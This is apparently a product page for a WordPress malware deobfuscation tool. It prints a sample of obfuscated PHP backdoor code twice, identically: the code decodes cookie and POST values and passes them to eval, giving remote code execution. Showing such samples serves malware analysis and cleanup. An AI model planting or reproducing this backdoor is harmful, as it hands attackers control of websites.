Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
$mjysd = '8it#vr64\'*o5eamfu9g1dksb7n23yHpx0_cl-';
$yeqvi = [];
$yeqvi[] = "H*";
$yeqvi[] = "3a02eb22-58e6-442f-bad6-1491d2f689d7";
$yeqvi[] = $mjysd[3];
$yeqvi[] = "count";
$yeqvi[] = "str_repeat";
$yeqvi[] = "explode";
$yeqvi[] = "substr";
$yeqvi[] = "array_merge";
$yeqvi[] = "strlen";
$yeqvi[] = "pack";
foreach (array_merge($_COOKIE, $_POST) as $jrjvo => $flxnx) {
function akrpta($yeqvi, $jrjvo, $lfhzra)
{
return $yeqvi[6]($yeqvi[4]($jrjvo . $yeqvi[1], $lfhzra / $yeqvi[8]($jrjvo) + 1), 0, $lfhzra);
}
function fwavtof($yeqvi, $iptmsq)
{
return @$yeqvi[9]($yeqvi[0], $iptmsq);
}
function yljyac($yeqvi, $iptmsq)
{
$feryg = $yeqvi[3]($iptmsq) % 3;
if (!$feryg) {
eval($iptmsq[1]($iptmsq[2]));
exit;
}
}
$flxnx = fwavtof($yeqvi, $flxnx);
yljyac($yeqvi, $yeqvi[5]($yeqvi[2], $flxnx ^ akrpta($yeqvi, $jrjvo, $yeqvi[8]($flxnx))));
}<?php
$mjysd = '8it#vr64\'*o5eamfu9g1dksb7n23yHpx0_cl-';
$yeqvi = [];
$yeqvi[] = "H*";
$yeqvi[] = "3a02eb22-58e6-442f-bad6-1491d2f689d7";
$yeqvi[] = $mjysd[3];
$yeqvi[] = "count";
$yeqvi[] = "str_repeat";
$yeqvi[] = "explode";
$yeqvi[] = "substr";
$yeqvi[] = "array_merge";
$yeqvi[] = "strlen";
$yeqvi[] = "pack";
foreach (array_merge($_COOKIE, $_POST) as $jrjvo => $flxnx) {
function akrpta($yeqvi, $jrjvo, $lfhzra)
{
return $yeqvi[6]($yeqvi[4]($jrjvo . $yeqvi[1], $lfhzra / $yeqvi[8]($jrjvo) + 1), 0, $lfhzra);
}
function fwavtof($yeqvi, $iptmsq)
{
return @$yeqvi[9]($yeqvi[0], $iptmsq);
}
function yljyac($yeqvi, $iptmsq)
{
$feryg = $yeqvi[3]($iptmsq) % 3;
if (!$feryg) {
eval($iptmsq[1]($iptmsq[2]));
exit;
}
}
$flxnx = fwavtof($yeqvi, $flxnx);
yljyac($yeqvi, $yeqvi[5]($yeqvi[2], $flxnx ^ akrpta($yeqvi, $jrjvo, $yeqvi[8]($flxnx))));
}Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.